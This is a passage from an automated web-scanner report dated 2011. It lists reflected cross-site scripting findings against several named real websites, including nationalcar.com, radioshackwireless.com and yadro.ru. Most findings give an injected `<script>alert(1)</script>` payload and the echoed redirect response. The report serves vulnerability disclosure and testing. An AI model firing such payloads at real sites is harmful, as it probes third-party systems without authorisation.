This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.nationalcar.com/?8f55f"><a>e5ae426b094=1</TITLE></HEAD><BODY><A HREF="https://www.nationalcar.com/?8f55f"><a>e5ae426b094=1">https://www.nationalcar.com/?8f55 ...[SNIP]...
2.109. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.nationalcar.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0438<a>5e02ce9b27a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.nationalcar.com/?e0438<a>5e02ce9b27a=1</TITLE></HEAD><BODY><A HREF="https://www.nationalcar.com/?e0438<a>5e02ce9b27a=1">https://www.nationalcar.com/?e0438<a>5e02ce9b27a=1</A> ...[SNIP]...
2.110. http://www.opinionoutpost.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.opinionoutpost.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c079"><script>alert(1)</script>8e52f6bccae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 302 This object has moved Content-type: text/html Content-Length: 261 Location: https://www.opinionoutpost.com:443/?8c079"><script>alert(1)</script>8e52f6bccae=1
<html><head><title>302 - This object has moved</title></head> <body> <h1>302: This object has moved</h1> <b><p>Please click <A HREF="https://www.opinionoutpost.com:443/?8c079"><script>alert(1)</script>8e52f6bccae=1"> ...[SNIP]...
2.111. http://www.radioshackwireless.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.radioshackwireless.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52414"><script>alert(1)</script>50f07126836 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://radioshackwireless.com/?52414"><script>alert(1)</script>50f07126836=1">http://radioshackwireless.com/?52414"><scri ...[SNIP]...
2.112. http://www.radioshackwireless.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.radioshackwireless.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e774e<script>alert(1)</script>694eb393332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://radioshackwireless.com/?e774e<script>alert(1)</script>694eb393332=1">http://radioshackwireless.com/?e774e<script>alert(1)</script>694eb393332=1</a> ...[SNIP]...
2.113. http://www.yadro.ru/ [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.yadro.ru
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe25"><script>alert(1)</script>17a24794658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><head><title>[302] Moved Temporarily</title></head> <body><h3>Moved Temporarily</h3> This document has moved <a href="http://members.yadro.ru/?8fe25"><script>alert(1)</script>17a24794658=1">here ...[SNIP]...
Report generated by XSS.CX at Sat Apr 02 11:20:54 CDT 2011.